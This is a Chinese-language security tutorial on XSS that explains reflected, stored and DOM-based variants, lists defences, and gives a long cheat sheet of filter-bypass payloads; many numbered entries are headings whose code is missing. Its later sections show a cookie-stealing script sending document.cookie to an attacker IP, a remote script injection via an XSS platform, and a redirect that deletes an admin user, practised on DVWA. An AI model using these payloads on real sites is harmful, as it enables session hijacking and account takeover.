XSS漏洞-摩杜云开发者社区

漏洞介绍

XSS 攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆，故将跨站脚本攻击缩写为 XSS，XSS 是一种在 web 应用中的计算机安全漏洞，它允许恶意 web 用户将代码植入到 web 网站里面，供给其它用户访问，当用户访问到有恶意代码的网页就会产生 XSS 攻击。

攻击危害

XSS 攻击的危害主要有：

盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号
控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力
盗窃企业重要的具有商业价值的资料
强制发送电子邮件
非法转账
网站挂马
控制受害者机器向其它网站发起攻击

防御方法

XSS 防御的总体思路是：对输入(和 URL 参数)进行过滤，对输出进行编码。也就是对提交的所有内容进行过滤，对 url 中的参数进行过滤，过滤掉会导致脚本执行的相关内容，然后对动态输出到页面的内容进行 html 编码，使脚本无法在浏览器中执行。

1、反射型 XSS

反射型 XSS，非持久化，需要欺骗用户自己去点击链接才能触发 XSS 代码。

反射型 xss 攻击的方法，攻击者通过发送邮件或诱导等方法，将包含有 xss 恶意链接发送给目标用户，当目标用户访问该链接时，服务器将接收该用户的请求并进行处理，然后服务器把带有 xss 恶意脚本发送给目标用户的浏览器，浏览器解析这段带有 xss 代码的恶意脚本后，就会触发 xss 攻击。

代码分析

首先判断 $_GET['mssage'] 是否等于 kobe，如果不是则将 $_GET['mssage'] 复制给$html 变量中，而且没有任何过滤并输出到页面中，所以直接输入 <script>alert('xss');</script> 页面会直接输出 xss 信息，造成 xss 攻击

2、存储型 XSS

存储型 XSS，持久化，恶意代码存储在服务器中的数据库里。

存储型 xss 攻击的方法，在个人信息或发表文章等地方，可以插入代码，如果插入的数据没有过滤或过滤不严，那么这些恶意代码就能直接储存到数据库中，用户访问该页面的时候，没有进行编码过滤直接输出到浏览器上，就会触发代码执行，造成 xss 攻击。

代码分析

在存储型 xss 代码中，看到留言的 inster into 语句中，直接插入留言信息，没有任何过滤，输入恶意代码，这个代码将存储在数据库中

进入数据库执行查询命令

浏览器在访问该页面的时候，恶意代码会从数据库字段里取出这条记录，没有经过任何处理就直接输出

3、DOM型 XSS

DOM，全称 Document Object Model，是一个平台和语言都中立的接口，可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM 型 XSS 其实是一种特殊类型的反射型 XSS，它是基于 DOM 文档对象模型的一种漏洞。

在网站中有许多页面的元素，当页面到达时，浏览器会为页面创建一个顶级的 Document object 文档对象，接着生成各个子文档对象，每个页面元素对应一个文档对象，每个文档对象包含属性、方法和事件。可以通过 JS 脚本对文档对象进行编辑从而修改页面的元素，即客户端的脚本程序可以通过 DOM 来动态修改页面内容，从客户端获取 DOM 中的数据并在本地执行。基于这个特性，就可以利用 JS 脚本来实现 XSS 漏洞的利用。

以下是一些经常出现 dom 型 xss 的关键语句

document.referer 属性

window.name 属性

location 属性

innerHTML 属性

documen.write 属性

代码分析

DOM 型 xss 程序中，只有 html 代码，dom 通过操作 HTML 或者 css 实现 HTML 属性、方法、事件，因此程序中没有与服务器进行交互

点击按钮时，会调用 domxss()函数，跟踪 domxss 函数

1 function domxss(){
2         var str = document.getElementById("text").value;
3         document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
4 }

获取 id text 文本的值，修改 id 为 dom 的 html 值，输入 ' onclick="alert('xss')"> 闭合前面的单引号即可

4、XSS 测试语句

在网站输入一些标签如< >输入后查看网页源代码是否进行过滤，如果没过滤则很大可能存在 xss 漏洞。

常用的测试语句

进行闭合

"><span>x</span><"

'>"><span>x</span><'

单行注释

"><span>x</span>//

5、XSS 攻击语句

输入检测确定标签没有过滤后，为了显示存在漏洞，需要插入 xss 攻击代码。

常用的语句

(1)普通的 XSS JavaScript 注入

(2)IMG 标签 XSS 使用 JavaScript 命令

(3)IMG 标签无分号无引号

(4)IMG 标签大小写不敏感

(5)HTML 编码(必须有分号)

(6)修正缺陷 IMG 标签

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7)formCharCode 标签(计算器)

(8)UTF-8 的 Unicode 编码(计算器)

(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)

(10)十六进制编码也是没有分号的(计算器)

(11)嵌入式标签,将 Javascript 分开

(12)嵌入式编码标签,将 Javascript 分开

(13)嵌入式换行符

(14)嵌入式回车

(15)嵌入式多行注入 JavaScript ,这是 XSS 极端的例子

(16)解决限制字符(要求同页面)

(17)空字符

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18)空字符 2 ,空字符在国内基本没效果,因为没有地方可以利用

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19)Spaces 和 meta 前的 IMG 标签

(20)Non-alpha-non-digit XSS

(21)Non-alpha-non-digit XSS to 2

(22)Non-alpha-non-digit XSS to 3

(23)双开括号

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)

(25)无结束脚本标记 2

(26)半开的 HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27)双开角括号

(28)无单引号双引号分号

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

(29)换码过滤的 JavaScript

\";alert('XSS');//

(30)结束 Title 标签

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31)Input Image

(32)BODY Image

(33)BODY 标签

<BODY('XSS')>

(34)IMG Dynsrc

(35)IMG Lowsrc

(36)BGSOUND

(37)STYLE sheet

(38)远程样式表

(39)List-style-image(列表式)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40)IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41)META 链接 url

(42)Iframe

(43)Frame

(44)Table

(45)TD

(46)DIV background-image

(47)DIV background-image 后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)

(48)DIV expression

(49)STYLE 属性分拆表达

(50)匿名 STYLE(组成:开角号和一个字母开头)

(51)STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A>

(52)IMG STYLE 方式

exppression(alert("XSS"))'>

(53)STYLE background

<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54)BASE

(55)EMBED 标签,你可以嵌入 FLASH ,其中包涵 XSS

(56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码

a="get";

b="URL(\"";

c="javascript:";

d="alert('XSS');\")";

eval_r(a+b+c+d);

(57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上

<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">

<xss:xss>XSS</xss:xss>

</HTML>

(58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用

(59)IMG 嵌入式命令,可执行任意命令

(60)IMG 嵌入式命令(a.jpg 在同服务器)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤

(62)<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68)URL 绕行

(69)URL 编码

(70)IP 十进制

(71)IP 十六进制

(72)IP 八进制

(73)混合编码

(74)节省[http:]

(75)节省[www]

(76)绝对点绝对 DNS

(77)javascript 链接

6、XSS 常见利用

xss 漏洞能够通过构造恶意的 xss 语句实现很多功能，其中最常用的是，构造 xss 恶意代码获取对方浏览器的 cookie。当发现存在 xss 漏洞时，如果只是弹出信息窗口，这样只能证明存在一个 xss 漏洞，想再进一步深入的话，就必须学会加载 xss 攻击 payload。同时加载 payload 也要考虑到语句的长度，语句越短越好，因为有的插入语句的长度会被限制。

常见的加载攻击语句有

引号也可以去掉

可以变成另一种格式

如果网站是 http 会自动加载 http，如果网站是 https 会自动变成 https

将下列代码保存为 xss.js 文件并引入

1 var img=document.createElement("img");
2 img.src="http://192.168.152.137?cookies=?"+escape(document.cookie);
3 document.body.appendChild(img);

在 kali 里面打开小型 web 服务

python2：python -m SimpleHTTPServer 80

python3：python -m http.server 80

登陆 dvwa 构造 xss 代码输入，插入成功之后，受害者访问该网页就会把它的 cookie 发送到 kali 的 web 服务上，查看日志就能得到 cookie

7、加载远程攻击的 paylod

常见的标准 payload

注意网站采用的协议

自动选择协议

图片创建加载

jquery 加载

字符拼接

一般是输入的字符有限制时使用

有的情况要用 /**/ 注释不需要的代码

8、利用 xss 平台盗取 cookie 登录

xss 漏洞利用平台，集合了 xss 攻击的多种方法，很方便快捷的利用 xss 漏洞，生成攻击代码。

使用 phpstudy 搭建网站和数据库，设置规则为伪静态

项目源码：https://github.com/78778443/xssplatform

将恶意代码插入存在漏洞的页面，当用户访问有问题的网页时，浏览器会加载恶意的攻击代码，会获取当前受害者访问网站的 cookie 发送到攻击者的服务器里。在留言处插入 xss 恶意代码

</textarea>'"><script src=http://xss123.com/P0MInE?1710642993></script>

xss 利用平台获取到 cookie 如果获取的 cookie 是后台管理员登录的认证 cookie，替换 cookie 即可登录后台

以 dvwa 存储型 xss 漏洞为例，输入恶意代码